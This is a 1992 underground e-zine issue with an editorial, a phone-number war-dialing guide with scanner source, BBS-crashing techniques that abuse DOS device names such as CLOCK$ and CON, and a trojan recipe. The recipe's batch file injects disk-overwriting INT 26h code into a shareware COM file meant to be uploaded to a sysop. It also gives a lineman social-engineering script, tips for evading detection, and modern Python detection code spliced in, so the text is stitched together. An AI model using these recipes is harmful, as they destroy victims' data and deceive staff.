Digital Free Press Vol 1 Issue 1
DIGITAL FREE PRESS
-------------------------------------------------------------------------------
V 1.0 Issue 1.0 January 1992
-------------------------------------------------------------------------------
* A Publication of The Underground Computing Foundation (UCF) *
* Send Submissions to: underg!hackers@uunet.uu.net *
* Editor: Max Cray (underg!max@uunet.uu.net) *
* BBS: The Underground (401) 841-5607 (v.32) *
------------------------------------------------------------------------------
In this Issue:
1. _The Future Computer_ Editorial by Max Cray
2. Phone Number Scanning by GodNet Raider
3. Fun with the CLOCK$ device driver by The Riddler
4. Homegrown Trojan by The BBC
------------------------------------------------------------------------------
The Future Computer
by Max Cray
In the future, your computer will be a standard household appliance,
like your water heater. It will probably be sitting in a back closet someplace
rarely seen. It will come with your house. Your house will also have a built
in local area network, and there will be terminals in almost every room.
The distinction between television, radio, and computer networks will
disappear, as the computer becomes the audio, and visual controller. Your
television will be a peripheral to your computer. It will receive from a cable
and feed into your computer, where you will be able to watch TV from any of the
terminals in the house. The terminals will consist of a monitor, probably with
a slot for a floppy disk, and a keyboard. Your stereo will also be a
peripheral to your computer but specialized music media will disappear as
music, movies, and new forms of entertainment will be distributed digitally on
normal computer disks, or through the network. Your video camera will also
become a computer PERIPHERAL, and the variety of programming will increase
exponentially, as private individuals will be able to create their own
programming to post on the audiovisual network, for all to experience. There
will be national audiovisual networks, and small private networks, similar to
computer bulletin boards of today, but they will be more like personal TV
stations. Those that watch will also contribute to programming, both real time,
and stored. You will be able to have your computer capture any real time event
you missed for storage, for you to later experience, edit, etc. You will
be able to send audio, and audiovisual mail, but normal electronic mail will
stay as many will not want to be seen or heard, especially early in the
morning.
There will be some political decisions to make, as those who control the
national computer networks will become very powerful, and freedom of expression
issues will continue to crop up, as there will be some who call for regulation.
However the power of the national networks will be leveraged by many smaller
networks, which will in fact have gateways to each other.
There will be centers for the treatment of those addicted to computers.
Your spouse will think it none too soon.
All the technology I have discussed already exists. The prime factor that
is preventing the changes to society is the cost of the technology. As we all
know, the cost of technology is always dropping. The speed that society
changes is directly related to the speed that the cost of technology drops.
-------------------------------------------------------------------------------
To: hackers@underg
Subject: Scanning.
From: gnr@tsf.UUCP (GodNet Raider)
Organization: The CyberUnderground
-=[ Intelligent Phone Number Scanning ]=-
-or-
/**********************************************/
/* How to find the number you are looking for */
/* without the help of a friendly operator. */
/**********************************************/
- written by -
GodNet Raider
- of -
The CyberUnderground
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
]----------------------------------------------------------------------------[
Introduction:
-------------
This phile is written to help in the eternal search for a place to jack
in. It contains tips that will help to make the most use of phone number
scanners and to better target a particular system.
Scanning Tools Needed:
----------------------
The only tools needed are a computer, phone number scanner software, and a
computer modem. The scanner program is one that dials numbers through your
modem under a given prefix and reports if a carrier (the signal that your
modem is connected to another modem) was found or not. There are a lot of
programs out there that will do this function nicely but for you obsessed
prodigies out there the source code for a simple scanner is provided at
the end of this phile.
Scanning Tips:
--------------
1) When looking for a particular system (company, school, etc..) keep in
mind the "+/- ten rule". This rule simply states that most jacks will
be found within ten (+/-) sequential instances from the normal
business phone number. In larger corporations this could be as much
as twenty (+/-). So to find a site with a business number at 555-1212
the scanner should start at 555-1202 and try the next twenty
instances (555-1202 to 555-1222) or ten below and above the base
number. It should also be noted that in places that had the system
installed long after it was established this system may not work. But
due to the great size and expense of some systems they are installed
day one, so the numbers are assigned to that site (voice, Data, fax,
etc..) sequentially.
2) Also in areas with more than one prefix (746, 747, 748) older sites
will be found on the lower prefixes (746/747), while newer
installations will be found on the higher ones (747/748).
3) Scanning should be done in small bursts to avoid alerting the PhoCo
to what you are up to. This means having the scanner only call about
3 numbers in a burst then wait 5 - 10 minutes for the next burst. It
is also a good idea to do no more than 50 tries every other day.
4) Don't go jacking right after finding a system. It is good practice to
wait a few days to allow any possible suspicion to wane.
It is easier to explain a seemingly one time jacking as "... Sorry,
must have misdialed a local bbs number. But I did hang up right away
as not to break any <sic> laws..." than it is to explain why you
misdialed the number 50 times in less than 30 minutes.
5) Social Engineering is always a last resort. Calling the site's
business number between 12:30 and 1:30 will allow for the regular
sysadmin to leave for lunch, leaving an intern or other busy/hurried
employee (who does not have the time to talk) to answer your inquiry.
Tell the person on the other end something like the following.
"Hello, This is lineman Xxxxxxx. I am out here at the junction
box and am tracing the line noise problem you reported. The
number on my service request does not show data equipment on that
line (give the number you are calling at this time)..."
If all goes well you should get a response like the following...
"Oh it seems you people at the PhoCo have screwed up (everyone
likes to take an elitist attitude toward the PhoCo, and loves to
point out errors and correct them). You have the business number
listed as the system number(s). The system number(s) is/are..."
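The tips above describe the scan from the dialer's side. As an added example that is not part of the article, here is the same pattern seen from the phone company's call records: even when the bursts are spread over days (tip 3), the numbers dialed still cluster inside the +/- ten window of tip 1, and grouping records by caller exposes the scan no matter how the calls are spaced in time. The record format and every record below are constructed.

```python
from collections import defaultdict

# Constructed call-detail records: "date time,caller,dialed".
# 555-9001 works through 555-1202..1208 in short bursts over two nights;
# 555-7700 is an ordinary caller with unrelated numbers.
CDR = """\
1992-01-03 02:10,555-9001,555-1202
1992-01-03 02:11,555-9001,555-1203
1992-01-03 02:12,555-9001,555-1204
1992-01-03 02:20,555-9001,555-1205
1992-01-03 02:21,555-9001,555-1206
1992-01-05 02:05,555-9001,555-1207
1992-01-05 02:06,555-9001,555-1208
1992-01-03 09:00,555-7700,555-1212
1992-01-03 11:30,555-7700,555-4431
1992-01-04 13:02,555-7700,555-1900
"""


def parse_cdr(text):
    """Split records into (when, caller, prefix, last four digits as int)."""
    rows = []
    for line in text.splitlines():
        when, caller, dialed = line.split(",")
        prefix, last4 = dialed.rsplit("-", 1)
        rows.append((when, caller, prefix, int(last4)))
    return rows


def sequential_clusters(rows, window=10, min_hits=5):
    """Return {caller: (prefix, low, high, count)} for every caller who dialed
    at least min_hits distinct numbers lying within 2*window+1 of each other
    on one prefix, i.e. the +/- window the article's rule 1 describes.
    Time is deliberately ignored: spacing the bursts out does not change
    the shape of the set of numbers tried."""
    dialed = defaultdict(set)
    for _, caller, prefix, last4 in rows:
        dialed[(caller, prefix)].add(last4)
    hits = {}
    for (caller, prefix), nums in dialed.items():
        nums = sorted(nums)
        lo = 0
        for hi in range(len(nums)):          # sliding window over sorted numbers
            while nums[hi] - nums[lo] > 2 * window:
                lo += 1
            count = hi - lo + 1
            if count >= min_hits and count > hits.get(caller, (None, 0, 0, 0))[3]:
                hits[caller] = (prefix, nums[lo], nums[hi], count)
    return hits


if __name__ == "__main__":
    for caller, (prefix, lo, hi, n) in sequential_clusters(parse_cdr(CDR)).items():
        print("%s dialed %d numbers in %s-%04d..%04d" % (caller, n, prefix, lo, hi))
```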
Scanner Source Code:
--------------------
The following source was written for the IBM pc/clones. As much ansi 'c'
was used as possible, but system specific information (like port i/o) has been
set off into specific functions so that it can be converted to other systems
without having to reinvent the wheel. This program takes information from
the command line and writes output to standard i/o.
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
/*
scanner.c
by GodNet Raider
It is assumed that the serial port and modem have already been setup.
Com 1 & 2 only supported.
inp()/outp() are the DOS compiler port I/O calls (conio.h on Borland and
Microsoft C); they are the only system specific part and are confined to
send_chr(), receive_chr() and the macros below.
*/
#include <conio.h>  /* inp(), outp() */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#define FALSE 0
#define TRUE 1
/* 8250 UART registers relative to the COM base address:
   +0 data, +4 modem control (bit 0 DTR, bit 1 RTS), +5 line status. */
#define DTR_ON(x) outp (anBCom [x] + 4, 0x03)   /* raise DTR and RTS */
#define DTR_OFF(x) outp (anBCom [x] + 4, 0x00)  /* drop DTR: modem hangs up */
/* Line status bit 5: transmitter holding register empty, safe to send. */
#define CTS(x) (inp (anBCom [x] + 5) & 0x20)
/* Line status bit 0: a received byte is waiting in the data register. */
#define DATA_READY(x) (inp (anBCom [x] + 5) & 0x01)
char
*aszError [] =
{
"\nUsage: SCANNER <Port #> <PreFix> <Start #> <Count>\n"
"\tPort # - Serial port number to use.\n"
"\tPreFix - Static part of phone number(ie. 1-800-555-, 846-, etc..).\n"
"\tStart # - last 4 digits of phone number (ie. 1212, 0065, etc..).\n"
"\tCount - Number of instances (single stepped) to scan.\n",
"\nNumbers are out of range.",
"\nModem error."
},
/* Modem result strings searched for (lower case); index 0 means carrier */
*aszTarget [] =
{
"connect",
"busy"
};
/* Base I/O addresses of COM1 and COM2 on the IBM PC */
unsigned int
anBCom [] =
{
0x3f8,
0x2f8
};
unsigned int
Call (unsigned char, char*),
receive_chr (unsigned long, unsigned char),
send_chr (unsigned char, unsigned char);
void
FatalError (int),
main (int, char**),
Wait (unsigned long);
void main (argc, argv)
int
argc;
char
*argv [];
{
char
szWork [128];
unsigned char
nPort;
unsigned int
nPrsNum,
nEndNum;
if (argc < 5)
FatalError (1);
nPort = (unsigned char) atoi (argv [1]) - 1;
nEndNum = (nPrsNum = atoi (argv [3])) + atoi (argv [4]);
if (nPrsNum > 9999 || nEndNum > 9999 || nEndNum <= nPrsNum || nPort > 1)
FatalError (2);
while (nPrsNum != nEndNum)
{
printf ("%s%04i : ", argv [2], nPrsNum);
sprintf (szWork, "ATX4Q0V1DT%s%04i\r", argv [2], nPrsNum++);
printf ("%sCarrier Found\n", (Call (nPort, szWork) ? "" : "No "));
}
exit (0);
}
unsigned int Call (nPort, ptDialStr)
unsigned char
nPort;
char
*ptDialStr;
{
unsigned long
nWait;
unsigned int
nTmpCnt,
nResChr,
nRetCode = FALSE;
char
fCont = TRUE,
szWork [256] = "",
*ptWork;
DTR_ON (nPort);
Wait (5);
while (*ptDialStr)
if (send_chr (*ptDialStr, nPort))
ptDialStr++;
else
if (!(receive_chr (1l, nPort) & 0xff00))
{
outp (anBCom [nPort] + 4, 0x00);
FatalError (3);
}
ptWork = szWork;
nWait = time (NULL) + 30;      /* give the modem 30 seconds to answer */
while (time (NULL) < nWait && fCont)
{
if ((nResChr = receive_chr (1l, nPort)) & 0xff00)
{
/* Stop one short of the end of szWork so a chatty modem cannot
   run past the buffer; the result strings are only a few bytes. */
if (ptWork >= szWork + sizeof (szWork) - 1)
break;
*(ptWork++) = (char) tolower (nResChr & 0x00ff);
*ptWork = 0x00;
/* Check for "busy" (index 1) then "connect" (index 0);
   only a connect counts as a carrier. */
for (nTmpCnt = 2; nTmpCnt && fCont; nTmpCnt--)
if (strstr (szWork, aszTarget [nTmpCnt - 1]))
{
if (--nTmpCnt)
printf ("[%s] ", aszTarget [nTmpCnt]);
nRetCode = !nTmpCnt;
fCont = FALSE;
}
}
}
DTR_OFF (nPort);
Wait (5);
return nRetCode;
}
unsigned int send_chr (cCh, nPort)
unsigned char
cCh,
nPort;
{
if (CTS (nPort))
{
outp (anBCom [nPort], (int) cCh);
return TRUE;
}
return FALSE;
}
unsigned int receive_chr (nWait, nPort)
unsigned long
nWait;
unsigned char
nPort;
{
nWait += time (NULL);
while (time (NULL) < nWait)
if (DATA_READY (nPort))
return ((inp (anBCom [nPort]) & 0x00ff) + 0x0100);
return FALSE;
}
void Wait (nWait)
unsigned long
nWait;
{
nWait += time (NULL);
while (time (NULL) < nWait);
}
void FatalError (nErrorNum)
int
nErrorNum;
{
/* Print the message as data, never as a format string */
printf ("%s", aszError [nErrorNum - 1]);
exit (nErrorNum);
}
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
]============================================================================[
Date: 08-03-91 (01:37) Number: 111 of 124
To: ALL Refer#: NONE
From: <SENSORED> Read: (N/A)
Subj: URGENT Status: PUBLIC MESSAGE
Conf: SYSOPS (5) Read Type: GENERAL (-)
*** ATTENTION MS-DOS BASED SYSTEM OPERATORS ***
This message is not a joke, scare, or farce. Read carefully and please
take precautions to prevent potential damage to your system.
A RI sysop has found [with the help of a local hacker - Ed]
a quite serious problem which appears to be in DOS.
The release of this information has to be done VERY carefully because of
the potential damage which can be done to bbs systems. (maliciously)
IF YOU WANT TO PREVENT DAMAGE TO YOUR SYSTEM:
Disable uploads with the pattern of CLO*.* immediately. If you do not,
you run the risk of not only crashing the board but losing your CMOS
configuration as well. This has been tested with 3 different PCBoard
systems, and they were affected immediately. This bug also affected the
tested computers in a non bbs environment (ie in DOS).
If you would like further information, please arrange a private voice
call or page during the day Saturday. Remember, we have to be very
careful about this information getting out there until this is addressed
and proper precautions have been taken by ALL sysops.
This problem is not a virus, trojan, or a particular file.... It is a
file NAME which causes this corruption of cmos configurations in 80286+
class machines, regardless of the file contents... The actual filename
has been PURPOSELY omitted from this message. Feel free to distribute
this notification to any other PRIVATE sysop base in the area. Note:
This should not be posted publicly, as it could be a potential security
problem and there are likely others that have not been discovered as of
yet. Please take any necessary precautions to protect your system.
[Editor's note: It's not that hard to run a MEM with the /d flag to find
the CLOCK$ device driver.]
--------------------------------------------------------------------------
Subject: Phrack 35
From: riddler (The Riddler)
In Phrack 35, a letter from The Dark Lord Sarik Malthus asked for the
justification of hacking: "...in your mind justify the actions of hackers..."
He runs a small bulletin board (running WWIV v.4.20) in an oppressive
fashion. He censors email and very strictly dictates behaviour on his BBS.
He does this, not by any social standards but by his own, which I admit is
admirable...but not when it suppresses FREEDOM OF INFORMATION. The experience
he has had with hackers was primarily with me crashing his board by repeatedly
finding bugs in the WWIV system. I tried every technique explained in
Phrack 34 with no success. However, I am writing to explain a few ways of
harmlessly and temporarily crashing any WWIV and most other BBS packages.
In the MS-DOG environment we are endowed with a few devices such as:
COM1, COM2, AUX, PRN, CON, and CLOCK$; yes, there is such a device.
Previous to Dark Lord's upgrade to version 4.20 of WWIV he was running version
4.12.
Here are two ways to crash that system:
Note: Use XMODEM OR ASCII PROTOCOLS, NOT ZMODEM OR YMODEM.
- #1 -
Go to the file xfer section.
Choose to upload a file.
When prompted with the filename, type COM2 (most likely where his modem is).
Finding this device as a file, WWIV asks if you would like to add that
filename to the file database; say yes.
At that point the file "COM2" will appear as a file available for download.
Download it.
Woooops. A big problem occurs when MS-DOG attempts to read from and write
to the same device name simultaneously. Oh well.
What will most likely happen is either a hardware lock-up or a dos
error message like "Write fult error reading COM2, Abort, Retry...."
Both require that a sysop do something to get the system back up.
- #2 -
Again, goto the file xfer section.
Choose to upload a file
When prompted with the name say you want to upload clock$.zip (ext. does not
matter). Upload any 'ol file on your harddrive, at least 6 bytes or so.
That upload will be fed directly to his clock as a new time setting. The bytes
being rather random, so will the new date/time. When you complete the xfer
WWIV attempts to find out how long you have been xfering for and how much
time you have left for that session and completely keels over.
It will not recover until the sysop has rebooted and reset the clock
or the CMOS-clock (if he has CMOS).
Clean cut and annoying.
- #3 - (not very thoroughly tested but should work)
Everything the same as in the previous two cracks up to the device name.
This time upload CON.
Upload your favourite ansi bombs and remap often used keys to
nasty dos commands or whatever...on the
remote system's keyboard. Hopefully the sysop will have loaded the
regular ansi.sys that comes with DOS. This is being fed directly
to his CON -- his keyboard/screen. Try to do this while the sysop
is in bed.
------------------------------------------------------------------------------
But oh no! Version 4.20 of WWIV came out. What will we do now?
It now prevents users from uploading files by the names of devices
altogether.
Try these techniques:
------------------------------------------------------------------------------
- #4
Create a zipfile containing a file of no less than 6 bytes (again) with a name
of exactly 6 chars. Then, using your favourite hex editor, open your zipfile
and change the two occurrences of your chosen filename of the file in the
zipfile to "ClOck$" (not case sensitive).
After the upload is completed goto the archive menu (a submenu off of the xfer
menu). Choose to extract a file within your zipfile temporarily. Extract the
clock$ within your freshly uploaded zipfile. WWIV, with the assistance of
PKzip, will extract the contained clock$'s contents and spew every byte right
into the clock$ device again. Clock/CMOS screwed again, crashing the
board and locking the computer up. Woops.
#5
Or try this:
Goto the archive menu in xfer section
choose to (A)dd a file to a temporary archive
then, guess what? choose clock$.
WWIV, again with help from PKzip, will (this time) read (not write) from
the clock$. Since it will never reach the EOF it is looking for, as it
would in a regular file, WWIV keels over again, in the process messing
the clock up thoroughly and locking the board and/or computer up.
--------------------------------------------------------------------------
| Uploading clock$ works also, on all PCBoard's versions 14.5 and lower. |
--------------------------------------------------------------------------
I have more BBS crashing techniques if you would like them.
Other BBSs, different techniques.
Happy Cracking and a Happy Crashed Year.
From The Underground Computing Foundation.
The Riddler
underg!riddler@uunet.uu.net
[Editor's Note: The UCF does not condone destructive actions. This material
is distributed to help sysops protect themselves from dangerous
users like The Riddler.]
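An added example, not from the article or from WWIV, of the check a BBS or any other program that accepts filenames needs against the device-name tricks above. DOS resolves a name to a character device on its stem alone, so the extension, the directory and the letter case are all irrelevant, and the same check has to run on every name a user supplies, including the member names inside an uploaded archive (the clock$-inside-a-zip and add-clock$-to-an-archive cases). CON, PRN, AUX, COM1, COM2 and CLOCK$ are the names the article mentions; NUL, COM3-COM9 and LPT1-LPT9 are added from the DOS device list.

```python
import re

# DOS character device names. DOS matches on the stem only, so
# "CLOCK$.ZIP", "clock$.txt" and "C:\UPLOADS\CLOCK$" all open the clock.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
RESERVED.update("COM%d" % i for i in range(1, 10))
RESERVED.update("LPT%d" % i for i in range(1, 10))


def dos_stem(name):
    """The part of a user-supplied name that DOS compares with its device
    table: last path component (either separator), text before the first
    '.', blanks trimmed, upper-cased."""
    leaf = re.split(r"[\\/]", name)[-1]
    return leaf.split(".", 1)[0].strip().upper()


def is_device_name(name):
    """True if opening this name under DOS reaches a device, not a file."""
    return dos_stem(name) in RESERVED


def check_user_filename(name, archive_members=()):
    """Reasons to refuse a name a user typed (upload name, archive add or
    extract target) and, for an uploaded archive, the names of its members:
    extracting or adding a member called clock$ hits the device just the same,
    which is how the 4.20 upload-name check was sidestepped."""
    problems = []
    if is_device_name(name):
        problems.append("%r is DOS device %s" % (name, dos_stem(name)))
    for member in archive_members:
        if is_device_name(member):
            problems.append("archive member %r is DOS device %s"
                            % (member, dos_stem(member)))
    return problems


if __name__ == "__main__":
    # Constructed names covering the cases the article describes
    for n in ("COM2", "clock$.zip", "ClOck$", "CON", "readme.txt", "clock.zip"):
        print("%-12s %s" % (n, "REJECT" if is_device_name(n) else "ok"))
    print(check_user_filename("GAME.ZIP", ["GAME.EXE", "ClOck$"]))
```

The archive member names have to be read from the archive's own directory before anything is extracted; the check is useless if PKZIP has already been run.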
------------------------------------------------------------------------------
Subject: Fun...
From: bbc (the bbc)
So you say you're bored... Want to do something but not sure what...
Well how about crashing a smug WWIV sysop!
Why not make a trojan [We mean the horse type] and send it
to them. How you say... Well not that weeeeeee... would condone such
an act..... But for information purposes only we will give you the
method to our madness...
Step 1:
Make a batch file called "INJECT.BAT" and in it place
the following commands -
============================================================
echo off
cls
echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp
echo w >> ~~temp.~tp
echo q >> ~~temp.~tp
debug %1 < ~~temp.~tp > nul
erase ~~temp.~tp > nul
==============================================================
Step 2:
Then copy a *.COM file into the same directory. Should
be part of some shareware thing that the sysop would like.
With docs an all... would not want them to get suspicious,
now would we.............
Step 3:
Run the following command from the dos prompt...
INJECT <COM file to inject with trojan>
Step 4:
Re-zip, arc, lharc, zoo, etc... the thing with its
other files...
Step 5:
Upload the mess to the unsuspecting sysop and watch the fun!
See and you thought hacking was hard...... Of course if they
get smug and start searching for the injected code.... We'll just have
to add extra code (NOPs etc) and switch some of the code around...
Next lesson How to bypass Disk protect programs and WWIV door
security.... Don't miss it.... Same bat time! Same bat channel!
The BBC
-------------------------------------------------------------------------------
[Editors note: In case you missed that BBC hack here it is disassembled:
0100 B419 MOV AH,19 'Get Default Drive
0102 CD21 INT 21 'Call DOS
0104 B90900 MOV CX,0009 'Write 9 Sectors
0107 33D2 XOR DX,DX 'Starting at sector 0
0109 CD26 INT 26 'Absolute Disk Write (Oouch!)
And that's all she wrote...
You can protect yourself from software that does this by using a utility
like MIRROR or IMAGE.]
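As an added example (not from the article), a scanner for the injected code just disassembled: it checks whether a COM image begins with the eleven-byte INT 26h sequence, repeats the check with NOP padding removed (the variation BBC threatens), and lists the offset of every INT 26h opcode in the file, an interrupt a game or text utility has no reason to issue. The sample COM images are constructed in memory and are not real programs.

```python
# The eleven bytes INJECT.BAT writes at CS:0100h, as disassembled above:
# mov ah,19h / int 21h / mov cx,9 / xor dx,dx / int 26h
INJECT_SIG = bytes.fromhex("b4 19 cd 21 b9 09 00 33 d2 cd 26")
INT26 = b"\xcd\x26"   # INT 26h, absolute disk write: overwrites raw sectors
NOP = 0x90
COM_LOAD = 0x100      # a COM image is loaded at offset 0100h


def strip_nops(code):
    """Remove NOPs so padding placed between the five instructions does not
    hide the signature. Heuristic: 90h can also be an operand byte, so odd
    code may slip past this check, but a match still means trouble."""
    return bytes(b for b in code if b != NOP)


def scan_com(image, entry_window=64):
    """Findings for one COM image (the bytes that load at 0100h)."""
    head = image[:entry_window]
    return {
        "exact_sig_at_entry": image.startswith(INJECT_SIG),
        "sig_after_nop_strip": strip_nops(head).startswith(INJECT_SIG),
        # offsets, as DEBUG would show them, of every INT 26h opcode
        "int26_offsets": [COM_LOAD + i for i in range(len(image) - 1)
                          if image[i:i + 2] == INT26],
    }


def is_suspicious(image):
    """Flag the exact injection, the NOP-padded variant, and any INT 26h
    at all; a disk utility may legitimately trip the last test."""
    f = scan_com(image)
    return (f["exact_sig_at_entry"] or f["sig_after_nop_strip"]
            or bool(f["int26_offsets"]))


# Constructed sample images:
# a harmless COM that prints "Hello$" via INT 21h function 9 and returns
CLEAN_COM = bytes.fromhex("b4 09 ba 08 01 cd 21 c3") + b"Hello$"
# the same program after INJECT.BAT overwrote its first eleven bytes
INJECTED_COM = INJECT_SIG + CLEAN_COM[len(INJECT_SIG):]
# the threatened variant with NOPs sprinkled between the instructions
PADDED_COM = (b"\x90\x90" + INJECT_SIG[:4] + b"\x90" + INJECT_SIG[4:7]
              + b"\x90\x90" + INJECT_SIG[7:] + CLEAN_COM[len(INJECT_SIG):])

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_COM), ("injected", INJECTED_COM),
                       ("padded", PADDED_COM)):
        print(label, is_suspicious(img), scan_com(img))
```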
Keep those letters coming...
The End